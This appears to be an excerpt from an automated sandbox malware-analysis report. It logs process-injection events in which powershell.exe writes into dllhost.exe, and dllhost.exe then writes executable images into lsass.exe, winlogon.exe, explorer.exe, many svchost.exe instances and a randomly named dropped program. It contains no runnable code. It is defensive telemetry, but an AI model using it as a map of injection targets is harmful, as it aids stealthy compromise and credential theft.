Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2550000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 9E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 20E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 14E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 13D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Users\user\AppData\Local\Temp\$778e373e base: F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe base: 7460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1F675170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Users\user\AppData\Local\Temp\$77eec42d base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: PID: 1028 base: 3200000 value: 4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 4304
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 41993B0010
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1E858950000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 140ADFC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 195DD590000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 1160CA30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 257E1070000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2652E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 254A27C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24B87DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 205FB3C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A205670000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18EC1F30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26238950000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2786E560000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1611FF70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27C0F350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B279570000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E70A460000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22D13110000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22C8C580000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2825F1D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20BAEC90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C782530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: A60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24066EB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 181CEDB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A142790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 195B6F30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DCC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DBF9DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A239D90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17CFA390000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FB7270000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DF53B50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 164E88A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25177B50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 28D5D340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 24EB5E10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20859990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F153C20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D241D40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 16FADAD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 20E03070000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15204DB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 3200000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 175C5280000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22EF1B30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 261DE4D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74470000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 226D8930000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13E5E930000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F843DC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 28AF9060000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27234C50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 28543540000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\audiodg.exe base: 2B684340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 21039380000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\cscript.exe base: 930000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 114A6AD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 250E2CD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 34C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1DCBB740000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1190000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 6D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1570000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2CF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2A40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 3000000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1060000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1590000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: C20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 8C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2E00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2870000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 6E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 8F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2290000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 28B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2640000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1570000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2AD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 650000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2A00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2B20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2870000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 12C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 6B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2C40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 24C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2A50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 9C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2960000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2C10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: D80000
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 6A0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2ED0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 800000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: BC0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: A00000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: A00000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2500000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2AE0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1010000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2DF0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2480000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1100000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: A00000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2CD0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 22C0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2A60000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1260000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 9C0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 850000Jump to behavior
